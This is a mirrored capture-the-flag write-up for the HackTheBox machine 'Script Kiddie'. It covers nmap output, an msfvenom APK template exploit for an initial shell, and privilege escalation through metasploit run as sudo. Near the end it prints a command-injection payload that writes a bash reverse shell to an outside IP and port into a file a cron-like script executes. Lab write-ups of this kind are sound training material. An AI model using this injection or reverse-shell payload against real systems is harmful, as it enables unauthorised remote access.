Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 14:21:55 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/HackTheBox/Script_Kiddie.md

107 lines
3.3 KiB
Markdown
Raw Normal View History

Add files via upload
2021-03-02 21:20:52 +00:00
# HackTheBox-Script Kiddie
## NMAP
```
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-02 19:59 PKT
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.63% done; ETC: 19:59 (0:00:00 remaining)
Nmap scan report for 10.10.10.226
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
4444/tcp open krb524?
| fingerprint-strings:
| GetRequest, NULL:
| eNrsvWmXIjmSKPo9fwVddXsCiqhgc3AnTmXNEOz7vmbncHwDHHwB31i66/32J/kq34DIqntn7pmbfboCl0wmk8lkMkkm089/S2mKnKI4MXW8qjtJ/MIJR0lWYyCFVGiOs79piWHt35Ji/z
rypLqRZMH+lkmRkdwvp4TC8iytOl8SfWDdL1XWkDyNOsoSzSpOHcrV+anuZJZkOHHrJ
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.45 seconds
```
## PORT 5000 (HTTP)
<img src="https://imgur.com/NLLAJJ1.png"/>
Here we can do an nmap scan on the machine but if we try to run bash commands it won't work
<img src="https://imgur.com/QXOmFOU.png"/>
<img src="https://imgur.com/n5mThGc.png"/>
Similarly with the msfvenom and searchsploit
<img src="https://imgur.com/BzJTgtb.png"/>
Msfvenom successfully generetes payload
<img src="https://imgur.com/WsEp93j.png"/>
But only windows and android payload generates
<img src="https://imgur.com/gdGJrIu.png"/>
Also there weren't any hidden directories or files on the webserver this page was only there on the machine. So on googling a little bit I found that `msfvenom` recently had a vulnerability in the process generating payload
<img src="https://imgur.com/JtdAtf1.png"/>
<img src="https://imgur.com/7PyVLu3.png"/>
This was a latest exploit so metasploit needs to be update if you run to any issues when updating metasploit regarding the gem file do this inorder
`gem update`
`cd /usr/share/metasploit-framework`
`sudo nano Gemfile.lock` (update reline version in that file this important before bundle install)
`sudo bundle install` ( in metasploit folder)
<img src="https://imgur.com/8Q46lfu.png"/>
<img src="https://imgur.com/0LR7Eg9.png"/>
<img src="https://imgur.com/B2pigeV.png"/>
Upload the apk file on the website
<img src="https://imgur.com/HCj6XEo.png"/>
<img src="https://imgur.com/DD2Z1sO.png"/>
And you'll get a shell so we will need to stabilize it
<img src="https://imgur.com/1MOGsiD.png"/>
Going to `pwn`'s home directory we see a bash script `scanlosers.sh` which was reading a script file from `kid`'s home directory and execute it
<img src="https://imgur.com/4vBH6TR.png"/>
Seeing that file belongs to `pwn`'s group
<img src="https://imgur.com/sOM8Kfa.png"/>
We can edit this with a bash reverse shell , this is the way the payload needs to be crafted.
`echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.126/1337 0>&1' #" >> hackers`
<img src="https://imgur.com/DcTRUUb.png"/>
Doing `sudo -l`
<img src="https://imgur.com/lwZ1jUB.png"/>
Running metasploit as `sudo`
<img src="https://imgur.com/CVSx2Ia.png"/>
We can now run commands as `root`
<img src="https://imgur.com/ZE6bFiQ.png"/>
<img src="https://imgur.com/r0Xsgrw.png"/>
Reference in a new issue Copy permalink